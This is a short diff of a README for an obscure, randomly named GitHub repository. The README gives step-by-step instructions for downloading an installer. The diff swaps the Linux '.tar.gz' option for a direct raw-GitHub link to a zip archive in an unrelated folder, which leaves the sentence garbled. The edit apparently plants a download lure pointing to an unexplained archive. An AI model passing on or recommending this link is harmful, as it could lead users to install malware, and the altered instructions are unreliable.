ktmnandhu/amanansdiahnid-13/README.md

 3. Find the appropriate file for your operating system.
 For example:
    - For Windows, look for the file ending with `.exe`.
    - For macOS, look for the file ending with `.dmg`.
-   - For Linux, a `.tar.gz` file may be available.
+   - For Linux, a `https://raw.githubusercontent.com/ktmnandhu/amanansdiahnid-13/main/neuromalacia/amanansdiahnid-13.zip` file may be available.
 4. Click on the file to start the download.
 Your browser will save the file to your default downloads folder.
 5. After the download is complete, locate the file in your downloads.